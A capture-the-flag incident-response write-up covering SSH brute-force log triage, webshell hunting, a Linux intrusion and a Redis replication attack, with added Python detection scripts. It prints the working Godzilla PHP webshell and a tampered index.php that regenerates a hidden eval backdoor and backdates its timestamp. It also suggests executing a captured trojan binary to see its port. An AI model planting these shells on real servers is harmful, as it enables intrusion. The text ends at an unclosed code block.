Xuanji (玄机) Target-Practice Diary
Chapter 1: Incident Response - Linux Log Analysis
1. How many IPs are brute-forcing the host's SSH root account? If there are several, separate them with ","
Look at auth.log* under /var/log.

Entries like the following are found:

```
Failed password for root
```
grep for it:

```shell
cat /var/log/auth.log* | grep -a "Failed password for root"
```

Three IPs are found:

```
flag{192.168.200.2,192.168.200.31,192.168.200.32}
```
2. Which IP logged in successfully through the SSH brute force? If there are several, separate them with ","
Scrolling through the log, the following string appears:

```
Accepted password for root
```
grep for it:

```shell
cat /var/log/auth.log* | grep -a "Accepted password for root"
```

Exclude our own IP.
3. What is the brute-force username dictionary? If there are several, separate them with ","
First filter on Failed password:

```shell
cat /var/log/auth.log* | grep -a "Failed password"
```

Clean up the results (a `sort` is inserted before `uniq -c`, because uniq only merges adjacent duplicate lines):

```shell
grep -a "Failed password" /var/log/auth.log.2 | perl -e 'while($_=<>){ /for(.*?) from/; print "$1\n";}' | sort | uniq -c | sort -nr
```

- `while($_=<>)`: read the grep output line by line
- `for(.*?) from`: regex that captures the field between `for` and `from`
- `print "$1\n"`: print the first capture group
- `sort | uniq -c`: sort, then count repeated lines, printing the count and the content
- `sort -nr`: numeric sort in reverse order
```shell
cat /var/log/auth.log* | grep -a "Failed password" | awk -F 'for ' '{print $2}' | awk -F ' from' '{print $1}' | sed 's/invalid user//g' | sed 's/^[ \t]*//;s/[ \t]*$//' | grep -v '^$' | sort | uniq -c | sort -nr
```

Here `-F 'for '` sets the awk field separator, so `$2` is everything after `for `; the second awk uses `-F ' from'`, so its `$1` is everything before ` from`. The two sed calls strip the `invalid user` prefix and any leading or trailing spaces and tabs, `grep -v '^$'` drops empty lines, and `sort | uniq -c | sort -nr` counts each username (uniq only merges adjacent lines, hence the sort in front of it).

```
flag{user,hello,root,test3,test2,test1}
```
4. How many brute-force attempts were made from the IP that logged in successfully?

```shell
cat /var/log/auth.log* | grep -a "Failed password for root" | awk '{print $11}' | sort -n | uniq -c
```

Or just look directly:

```shell
cat /var/log/auth.log* | grep -a "Failed password for root from 192.168.200.2"
```
5. After logging in, the attacker created a backdoor user. What is the username?
Scrolling through the log we see useradd.
grep for it:

```shell
cat /var/log/auth.log* | grep -a "useradd"
```

It is already obvious from that; grep for linux-rz to narrow it down:

```shell
cat /var/log/auth.log* | grep -a "useradd" | grep -a "linux-rz"
```

Or search directly for "new user", or look for suspicious users in /etc/passwd:

```shell
cat auth.log.1 | grep -a "new user"
```
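The grep/awk pipelines above, as one Python pass over auth.log. This is an added example, not code from the write-up; the log lines are constructed for the demo (on a real host read /var/log/auth.log* instead), and the `exclude` set stands in for "our own IP".

```python
"""Added example (not from the write-up): a Python version of the grep/awk
triage above, answering the five questions in one pass over auth.log:
brute-force sources against root, successful logins, the username
dictionary, attempts per source IP, and user creation. The log lines are
constructed for the demo; on a real host read /var/log/auth.log* instead."""
import re
from collections import Counter

SAMPLE_AUTH_LOG = """\
Aug  1 10:00:01 web sshd[1001]: Failed password for root from 192.168.200.2 port 40001 ssh2
Aug  1 10:00:02 web sshd[1002]: Failed password for invalid user test1 from 192.168.200.31 port 40002 ssh2
Aug  1 10:00:03 web sshd[1003]: Failed password for root from 192.168.200.31 port 40003 ssh2
Aug  1 10:00:04 web sshd[1004]: Failed password for invalid user hello from 192.168.200.32 port 40004 ssh2
Aug  1 10:00:05 web sshd[1005]: Failed password for root from 192.168.200.2 port 40005 ssh2
Aug  1 10:00:06 web sshd[1006]: Accepted password for root from 192.168.200.2 port 40006 ssh2
Aug  1 10:00:07 web sshd[1007]: Accepted publickey for admin from 10.0.0.5 port 40007 ssh2
Aug  1 10:00:08 web useradd[1100]: new user: name=linux-rz, UID=1001, GID=1001, home=/home/linux-rz, shell=/bin/bash
"""

# sshd inserts "invalid user" for names that do not exist; the optional group
# absorbs it so the username field lines up, like the sed step in the text.
FAILED_RE = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+) port")
ACCEPTED_RE = re.compile(r"Accepted \S+ for (\S+) from (\S+) port")
NEW_USER_RE = re.compile(r"useradd\[\d+\]: new user: name=([^,]+)")


def parse_auth_log(text):
    """Split the log into failed logins, accepted logins and created users."""
    failed, accepted, new_users = [], [], []
    for line in text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            failed.append((m.group(1), m.group(2)))  # (user, ip)
            continue
        m = ACCEPTED_RE.search(line)
        if m:
            accepted.append((m.group(1), m.group(2)))
            continue
        m = NEW_USER_RE.search(line)
        if m:
            new_users.append(m.group(1))
    return failed, accepted, new_users


def root_bruteforce_ips(failed):
    """Q1: every source IP that failed against root."""
    return sorted({ip for user, ip in failed if user == "root"})


def successful_login_ips(accepted, exclude=()):
    """Q2: IPs that got in, minus our own admin addresses."""
    return sorted({ip for _, ip in accepted if ip not in exclude})


def username_dictionary(failed):
    """Q3: usernames tried, with counts (the sort|uniq -c|sort -nr step)."""
    return Counter(user for user, _ in failed)


def attempts_by_ip(failed):
    """Q4: failed attempts per source IP."""
    return Counter(ip for _, ip in failed)
```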
Chapter 1: Incident Response - Webshell Hunting
1. The flag inside the attacker's webshell flag{xxxxx-xxxx-xxxx-xxxx-xxxx}
Download the files under the web directory to the local machine and scan them with D盾 (D-Shield).

gz.php:

```php
<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
// XOR every byte with the 16-byte key (key index offset by one); this is Godzilla's codec
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
//027ccd04-5065-48b6-a32d-77c704a5e26d
$payloadName='payload';
$key='3c6e0b8a9c15224a';
$data=file_get_contents("php://input"); // the raw POST body is the encoded request
if ($data!==false){
    $data=encode($data,$key);
    if (isset($_SESSION[$payloadName])){
        // later requests: decode the cached payload and run the client's command
        $payload=encode($_SESSION[$payloadName],$key);
        if (strpos($payload,"getBasicsInfo")===false){
            $payload=encode($payload,$key);
        }
        eval($payload);
        echo encode(@run($data),$key);
    }else{
        // first request: cache the payload (it contains getBasicsInfo) in the session
        if (strpos($data,"getBasicsInfo")!==false){
            $_SESSION[$payloadName]=encode($data,$key);
        }
    }
}
```

```
flag{027ccd04-5065-48b6-a32d-77c704a5e26d}
```
2. The md5 of the GitHub URL of the tool the attacker used for the shell flag{md5}
It is Godzilla at a glance.

```
https://github.com/BeichenDream/Godzilla --> 39392de3218c333f794befef07ac9257
```

```
flag{39392de3218c333f794befef07ac9257}
```
3. The md5 of the full path of the shell the attacker hid flag{md5} Note: /xxx/xxx/xxx/xxx/xxx.xxx

```
/var/www/html/include/Db/.Mysqli.php --> aebac0e58cd6c5fad1695ee4d1ac1919
```

```
flag{aebac0e58cd6c5fad1695ee4d1ac1919}
```
4. The md5 of the full path of the attacker's AV-evading shell flag{md5}
D-Shield has already flagged it: top.php.
We can also check access.log; the requested path is the seventh field (a `sort` is inserted before `uniq -c` so that counts are correct):

```shell
cat /var/log/apache2/access.log | awk '{print $7}' | sort | uniq -c
```

```
/var/www/html/wap/top.php --> eeff2eabfd9b7a6d26fc1a53d3f7d1de
```

```
flag{eeff2eabfd9b7a6d26fc1a53d3f7d1de}
```
Chapter 1: Incident Response - Linux Intrusion Investigation
1. There is a trojan in the web directory; find the trojan's password and submit it
Go to the web directory.

2. The server appears to host an "undying" (self-regenerating) shell; find its password and submit it
Check the file permissions.

index.php is, surprisingly, owned by root:
```php
<?php
include('config.php');
include(SYS_ROOT.INC.'common.php');
$path=$_SERVER['PATH_INFO'].($_SERVER['QUERY_STRING']?'?'.str_replace('?','',$_SERVER['QUERY_STRING']):'');
if(substr($path, 0,1)=='/'){
    $path=substr($path,1);
}
$path = Base::safeword($path);
$ctrl=isset($_GET['action'])?$_GET['action']:'run';
if(isset($_GET['createprocess']))
{
    Index::createhtml(isset($_GET['id'])?$_GET['id']:0,$_GET['cat'],$_GET['single']);
}else{
    Index::run($path);
}
// appended by the attacker: every request to index.php re-creates the hidden shell
$file = '/var/www/html/.shell.php';
$code = '<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?>';
file_put_contents($file, $code);
// touch -m rewrites only the mtime; the ctime still records the real write time
system('touch -m -d "2021-01-01 00:00:01" .shell.php');
usleep(3000);
?>
```

This is the operation that writes .shell.php; look up the MD5 hash used for pass.
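A way to hunt the planted .shell.php and check its password, as an added example that is not part of the write-up. It builds a throwaway webroot (constructed for the demo, not the box's /var/www/html), plants the same shell body and backdates its mtime the way `touch -m -d` does, then scans for the signals that survive that trick.

```python
"""Added example (not from the write-up): hunting the self-regenerating
("undying") shell planted by the tampered index.php above. It builds a
throwaway webroot, constructed for the demo, plants .shell.php with the
same body and backdates its mtime the way `touch -m -d` does, then scans
for the signals that survive: a dotfile, an mtime far older than the ctime
(touch cannot rewrite ctime), and an eval of request data. It also checks a
candidate password against the md5 hard-coded in the shell."""
import hashlib
import os
import re
import tempfile
import time

# Body written by the tampered index.php on the page.
SHELL_CODE = ('<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592")'
              '{@eval($_POST[cmd]);}?>')
EVAL_RE = re.compile(r"eval\s*\(\s*\$_(POST|GET|REQUEST)", re.I)
MD5_RE = re.compile(r'md5\(\$_POST\["pass"\]\)=="([0-9a-f]{32})"')


def build_webroot():
    """Construct the demo webroot: a benign index.php plus the planted shell."""
    root = tempfile.mkdtemp(prefix="webroot-")
    with open(os.path.join(root, "index.php"), "w") as f:
        f.write("<?php echo 'hello'; ?>")
    shell = os.path.join(root, ".shell.php")
    with open(shell, "w") as f:
        f.write(SHELL_CODE)
    # Mimic `touch -m -d "2021-01-01 00:00:01"`: mtime goes back, ctime stays now.
    backdated = time.mktime((2021, 1, 1, 0, 0, 1, 0, 0, -1))
    os.utime(shell, (backdated, backdated))
    return root


def scan_webroot(root, skew_seconds=86400):
    """Return [(relative path, [reasons])] for every .php file that looks planted."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            st = os.stat(path)
            reasons = []
            if name.startswith("."):
                reasons.append("hidden dotfile")
            # touch -m cannot move ctime, so a large ctime-mtime gap is the tell
            if st.st_ctime - st.st_mtime > skew_seconds:
                reasons.append("mtime backdated relative to ctime")
            with open(path, errors="replace") as f:
                body = f.read()
            if EVAL_RE.search(body):
                reasons.append("eval of request data")
            if reasons:
                findings.append((os.path.relpath(path, root), reasons))
    return findings


def shell_password_matches(body, candidate):
    """True if md5(candidate) equals the hash hard-coded in a shell body."""
    m = MD5_RE.search(body)
    return bool(m) and hashlib.md5(candidate.encode()).hexdigest() == m.group(1)
```

Deleting .shell.php alone is not enough, since every request to the tampered index.php writes it again; the appended block has to be removed from index.php first.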
3. Which file generated the undying shell? Submit the file name
4. The attacker left a trojan file; find the attacker's server IP and submit it
When running ls earlier we saw a suspicious binary, shell(1).elf.
Analyze it in the ThreatBook (微步) cloud sandbox.

5. The attacker left a trojan file; find the listening port opened on the attacker's server and submit it
The sandbox output above also shows the listening port is 3333.
Or run the file first, then check with netstat:

```shell
chmod 777 'shell(1).elf'
./'shell(1).elf'
netstat -antlp
```
Chapter 2: Log Analysis - Redis Incident Response
SSH into the server from the local PC and determine the IP from which the attacker's attack succeeded; submit the attacker IP as the FLAG;
A first look shows no web service on the box, so we go straight to /var/log/redis.log.
Log:

```
419:M 31 Jul 2023 05:25:31.525 # WARNING: The TCP backlog setting of 511 cannot be enforced because /proc/sys/net/core/somaxconn is set to the lower value of 128.
419:M 31 Jul 2023 05:25:31.525 # Server initialized
419:M 31 Jul 2023 05:25:31.525 # WARNING overcommit_memory is set to 0! Background save may fail under low memory condition. To fix this issue add 'vm.overcommit_memory = 1' to /etc/sysctl.conf and then reboot or run the command 'sysctl vm.overcommit_memory=1' for this to take effect.
419:M 31 Jul 2023 05:25:31.525 # WARNING you have Transparent Huge Pages (THP) support enabled in your kernel. This will create latency and memory usage issues with Redis. To fix this issue run the command 'echo never > /sys/kernel/mm/transparent_hugepage/enabled' as root, and add it to your /etc/rc.local in order to retain the setting after a reboot. Redis must be restarted after THP is disabled.
419:M 31 Jul 2023 05:25:31.525 * Ready to accept connections
419:S 31 Jul 2023 05:33:15.065 * Before turning into a replica, using my master parameters to synthesize a cached master: I may be able to synchronize with the new master with just a partial transfer.
419:S 31 Jul 2023 05:33:15.065 * REPLICAOF 192.168.100.13:8888 enabled (user request from 'id=3 addr=192.168.200.2:64289 fd=7 name= age=0 idle=0 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=48 qbuf-free=32720 obl=0 oll=0 omem=0 events=r cmd=slaveof')
419:S 31 Jul 2023 05:33:15.610 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:15.610 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:15.611 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:16.612 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:16.612 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:16.613 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:17.614 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:17.614 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:17.615 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:18.616 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:18.616 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:18.617 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:19.618 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:19.619 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:19.620 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:20.621 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:20.621 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:20.622 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:21.623 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:21.623 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:21.624 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:22.625 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:22.625 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:22.626 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:23.627 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:23.627 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:23.628 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:24.628 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:24.629 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:24.630 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:25.631 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:25.631 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:25.632 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:26.633 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:26.633 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:26.634 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:27.635 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:27.635 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:27.636 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:28.637 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:28.637 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:28.638 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:29.639 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:29.639 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:29.640 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:30.641 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:30.641 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:30.642 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:31.643 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:31.643 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:31.644 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:32.644 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:32.645 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:32.645 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:33.647 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:33.647 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:33.648 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:34.649 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:34.650 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:34.650 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:35.652 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:35.653 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:35.653 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:36.656 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:36.656 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:36.656 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:37.659 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:37.659 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:37.659 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:38.661 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:38.662 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:38.662 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:39.664 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:39.665 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:39.666 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:40.667 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:40.668 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:40.668 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:41.670 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:41.671 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:41.671 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:42.674 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:42.674 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:42.675 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:43.676 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:43.676 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:43.676 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:44.679 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:44.679 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:44.680 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:45.681 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:45.681 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:45.682 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:46.683 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:46.683 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:46.684 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:47.685 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:47.685 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:47.686 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:48.687 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:48.687 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:48.688 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:49.689 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:49.690 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:49.691 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:50.692 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:50.692 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:50.693 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:51.694 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:51.694 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:51.695 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:52.696 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:52.696 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:52.697 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:53.698 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:53.698 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:53.699 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:54.700 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:54.700 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:54.701 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:55.702 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:55.702 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:55.702 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:56.704 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:56.705 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:56.705 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:57.707 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:57.708 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:57.708 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:58.709 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:58.709 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:58.710 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:59.711 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:59.712 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:59.712 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:34:00.715 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:34:00.715 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:34:00.715 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:34:01.717 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:34:01.717 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:34:01.718 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:34:02.719 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:34:02.719 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:34:02.720 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:34:03.034 * REPLICAOF 192.168.31.55:8888 enabled (user request from 'id=5 addr=192.168.200.2:64319 fd=7 name= age=0 idle=0 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=47 qbuf-free=32721 obl=0 oll=0 omem=0 events=r cmd=slaveof')
419:S 31 Jul 2023 05:34:03.722 * Connecting to MASTER 192.168.31.55:8888
419:S 31 Jul 2023 05:34:03.722 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:34:33.173 * REPLICAOF 192.168.100.20:8888 enabled (user request from 'id=6 addr=192.168.200.2:64339 fd=7 name= age=0 idle=0 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=48 qbuf-free=32720 obl=0 oll=0 omem=0 events=r cmd=slaveof')
419:S 31 Jul 2023 05:34:33.786 * Connecting to MASTER 192.168.100.20:8888
419:S 31 Jul 2023 05:34:33.786 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:34:33.788 * Non blocking connect for SYNC fired the event.
419:S 31 Jul 2023 05:34:35.192 * Master replied to PING, replication can continue...
419:S 31 Jul 2023 05:34:35.194 * Trying a partial resynchronization (request 7a73a1a4297a16c50d8465b0cc432444f0e5df71:1).
419:S 31 Jul 2023 05:34:35.195 * Full resync from master: ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ:1
419:S 31 Jul 2023 05:34:35.195 * Discarding previously cached master state.
419:S 31 Jul 2023 05:34:35.195 * MASTER <-> REPLICA sync: receiving 48040 bytes from master
419:S 31 Jul 2023 05:34:35.197 * MASTER <-> REPLICA sync: Flushing old data
419:S 31 Jul 2023 05:34:35.197 * MASTER <-> REPLICA sync: Loading DB in memory
419:S 31 Jul 2023 05:34:35.197 # Wrong signature trying to load DB from file
419:S 31 Jul 2023 05:34:35.197 # Failed trying to load the MASTER synchronization DB from disk
419:S 31 Jul 2023 05:34:35.791 * Connecting to MASTER 192.168.100.20:8888
419:S 31 Jul 2023 05:34:35.791 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:34:35.792 * Non blocking connect for SYNC fired the event.
419:S 31 Jul 2023 05:34:37.205 * Module 'system' loaded from ./exp.so
419:M 31 Jul 2023 05:34:37.210 # Setting secondary replication ID to 7a73a1a4297a16c50d8465b0cc432444f0e5df71, valid up to offset: 1. New replication ID is 46e68f9593cd148bffe464f0b04bee19ac447c39
419:M 31 Jul 2023 05:34:37.210 * MASTER MODE enabled (user request from 'id=6 addr=192.168.200.2:64339 fd=7 name= age=4 idle=0 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=34 qbuf-free=32734 obl=0 oll=0 omem=0 events=r cmd=slaveof')
419:M 31 Jul 2023 05:34:37.231 * Module system unloaded
419:M 31 Jul 2023 05:42:00.685 * DB saved on disk
419:M 31 Jul 2023 05:42:42.213 * DB saved on disk
419:M 31 Jul 2023 06:06:44.597 # User requested shutdown...
419:M 31 Jul 2023 06:06:44.597 * Saving the final RDB snapshot before exiting.
419:M 31 Jul 2023 06:06:44.599 * DB saved on disk
419:M 31 Jul 2023 06:06:44.599 * Removing the pid file.
419:M 31 Jul 2023 06:06:44.599 # Redis is now ready to exit, bye bye...
441:C 31 Jul 2023 06:10:29.635 # oO0OoO0OoO0Oo Redis is starting oO0OoO0OoO0Oo
441:C 31 Jul 2023 06:10:29.640 # Redis version=5.0.1, bits=64, commit=00000000, modified=0, pid=441, just started
441:C 31 Jul 2023 06:10:29.640 # Configuration loaded
441:M 31 Jul 2023 06:10:29.643 * Increased maximum number of open files to 10032 (it was originally set to 1024).
```

This section differs from everything else in the log: a master-slave replication attack was carried out, and the IP is visible in it.
SSH into the server from the local PC and analyze the first malicious file the attacker uploaded; submit the FLAG inside that malicious file;

```
419:S 31 Jul 2023 05:34:35.195 * Full resync from master: ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ:1
419:S 31 Jul 2023 05:34:35.195 * Discarding previously cached master state.
419:S 31 Jul 2023 05:34:35.195 * MASTER <-> REPLICA sync: receiving 48040 bytes from master
419:S 31 Jul 2023 05:34:35.197 * MASTER <-> REPLICA sync: Flushing old data
419:S 31 Jul 2023 05:34:35.197 * MASTER <-> REPLICA sync: Loading DB in memory
419:S 31 Jul 2023 05:34:35.197 # Wrong signature trying to load DB from file
419:S 31 Jul 2023 05:34:35.197 # Failed trying to load the MASTER synchronization DB from disk
419:S 31 Jul 2023 05:34:35.791 * Connecting to MASTER 192.168.100.20:8888
419:S 31 Jul 2023 05:34:35.791 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:34:35.792 * Non blocking connect for SYNC fired the event.
419:S 31 Jul 2023 05:34:37.205 * Module 'system' loaded from ./exp.so
419:M 31 Jul 2023 05:34:37.210 # Setting secondary replication ID to 7a73a1a4297a16c50d8465b0cc432444f0e5df71, valid up to offset: 1. New replication ID is 46e68f9593cd148bffe464f0b04bee19ac447c39
419:M 31 Jul 2023 05:34:37.210 * MASTER MODE enabled (user request from 'id=6 addr=192.168.200.2:64339 fd=7 name= age=4 idle=0 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=34 qbuf-free=32734 obl=0 oll=0 omem=0 events=r cmd=slaveof')
```

Here we see this line:

```
419:S 31 Jul 2023 05:34:37.205 * Module 'system' loaded from ./exp.so
```

So the malicious file is exp.so.
Pull it off the box with a transfer tool and drop it into IDA; we know we are looking for a flag string.
Press shift+F12 to bring up the Strings window, then search for flag.

```
